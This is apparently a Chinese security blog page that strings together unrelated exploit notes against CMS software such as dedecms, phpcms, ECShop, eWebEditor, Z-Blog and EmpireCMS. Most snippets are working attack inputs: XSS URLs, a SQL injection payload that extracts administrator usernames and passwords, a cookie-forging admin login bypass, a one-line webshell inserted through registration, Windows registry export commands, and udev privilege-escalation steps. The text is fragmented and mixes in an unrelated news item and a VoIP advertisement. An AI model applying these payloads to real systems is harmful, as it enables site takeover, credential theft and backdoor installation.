河北网络安全博客

影响版本：dedecms5.5-5.6
官方网站：http://www.dedecms.com
漏洞类型：设计错误
漏洞代码：member\index_do.php

漏洞文件：cmd.asp

11月17日消息，今日有域名界人士向TechWeb反映，众多在新网注册的CN域名被盗，包括51.cn、61.cn、168.cn、188.cn等极具价值的域名。域名界人士认为，被盗原因很可能是新网系统存在重大漏洞。

phpcms最新版注入漏洞 注入yp/company.php?where=%23
进入后台访问
http://www.jzq8.com/admin.php?mod=phpcms&file=safe&action=see_code&files=kindle.php

     ECShop 2.7.2正式版的源代码, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台！ 漏洞的影响 ECShop 2.7.2，ECShop 2.7.1 不受影响 漏洞的出现 漏洞出现在/include/init.php文件的512行左右, 代码如下

测试方法： 保存以下代码为phpcms2008.php。安装php，进入php目录。执行php php2008.php localhost /yq 本地测试成功。

      被挂马页面1：http://www.onlinedown.net/soft/3011.htm  被挂马页面2：http://www.onlinedown.net/softdown/3011_2.htm  不知道这次是华军真的被挂马呢还是误报

代码如下，括号任意内容
http://dota.uuu9.com/Search.aspx?keyword=<script>alert("http://www.kingwq.cn")</script>

测试代码: 需要先登入会员
http://u.discuz.net//home//space.php?<script>alert(/hiphop/)</script></script>

这个编辑器相当的简陋，下午拿站的时候碰到了一个，没有数据库备份，也没有什么可以直接上传webshell的地方，简陋到只有一个editor的界面。简单说下利用的方法吧。

访问ask目录,注册用户,
在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a

今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没
今天下了个3.8的,竟然找出一点令人兴奋的东西出来…
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道
利用方法:首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php
...

        1、服务器在内网。
　　2、做了tcp/ip筛选。
　　先执行下面cmd命令：
　　cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip，导出注册表里关于TCP/IP筛选的第一处
　　cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip，导出注册表里关于TCP/IP筛选的第二处
...

GG关键字：inurl:e/tool/gbook/?bid=1
主要填写您的姓名和联系邮箱这两处，其它的随便填。
您的姓名:縗\
联系邮箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
然后进行提交返回页面即爆出用户名密码。

http://www.alicall.com/freevoip.htm

正在搞活动 注册给6-100分钟的电话时间

漏洞描述：
Z-BLOG后台登陆错误信息显示文件c_error.asp，虽然对跳转URL的参数sourceurl进行了编码，但没有判断链接头部，执行了javascript伪协议，造成跨站脚本漏洞。
漏洞测试：

http://www.xxx.com/function/c_error.asp?errorid=7&number=0&description=&source=&sourceurl=javascript:alert(document.cookie)
...

神秘小强&１９４３
说实话如果一个网站的前台都是注入漏洞，那么凭经验，万能密码进后台的几率基本上是

百分之百。

     可是有的人说对PHP的站如果是GPC魔术转换开启，就会对特殊符号转义，就彻底杜绝了

PHP注入。

     其实说这话的人没有好好想过，更没有尝试过用万能密码进PHP的后台。

     其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。

1、加引号’这个最常用 

2、变参数类型，比如把id=1改为id=a等 有时很有效果 

3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果 

4、text.php?aa[]=xx 

5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试. 

来源：职业欠钱
  这段时间UDEV溢出漏洞很火，在虚拟机上做了下试验，发现确实很好用。
貌似通杀范围很广

1. 将http://www.milw0rm.com/exploits/8478 保存为一个shell文件，也可以随便命名，例如我后面命名为a

2. 查找udev的第一个socket的PID，可以通过执行如下命令获得：
   cat /proc/net/netlink

3. 将出现在第一行的PID减去1，作为参数，例如
...